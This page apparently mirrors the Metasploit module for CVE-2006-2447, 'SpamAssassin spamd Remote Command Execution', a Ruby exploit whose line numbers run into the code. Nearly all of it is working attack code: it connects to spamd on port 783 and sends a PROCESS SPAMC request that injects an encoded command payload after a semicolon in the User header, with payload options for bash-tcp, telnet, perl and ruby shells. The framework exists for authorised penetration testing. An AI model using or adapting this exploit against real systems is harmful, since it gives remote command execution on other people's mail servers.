Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/unix/misc/spamassassin_exec.rb
Views: 11623
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::Tcp910def initialize(info = {})11super(update_info(info,12'Name' => 'SpamAssassin spamd Remote Command Execution',13'Description' => %q{14This module exploits a flaw in the SpamAssassin spamd service by specifying15a malicious vpopmail User header, when running with vpopmail and paranoid16modes enabled (non-default). Versions prior to v3.1.3 are vulnerable17},18'Author' => [ 'aushack' ],19'License' => MSF_LICENSE,20'References' =>21[22[ 'CVE', '2006-2447' ],23[ 'OSVDB', '26177' ],24[ 'BID', '18290' ],25[ 'URL', 'http://spamassassin.apache.org/advisories/cve-2006-2447.txt' ],26],27'Privileged' => false,28'Payload' =>29{30'DisableNops' => true,31'Space' => 1024,32'Compat' =>33{34'PayloadType' => 'cmd cmd_bash',35'RequiredCmd' => 'generic perl ruby bash-tcp telnet',36}37},38'Platform' => 'unix',39'Arch' => ARCH_CMD,40'Targets' =>41[42[ 'Automatic', { }],43],44'DisclosureDate' => '2006-06-06',45'DefaultTarget' => 0))4647register_options(48[49Opt::RPORT(783)50])51end5253def exploit54connect5556content = Rex::Text.rand_text_alpha(20)5758sploit = "PROCESS SPAMC/1.2\r\n"59sploit << "Content-length: #{(content.length + 2)}\r\n"60sploit << "User: ;#{payload.encoded}\r\n\r\n"61sploit << content + "\r\n\r\n"6263sock.put(sploit)6465handler66disconnect67end68end697071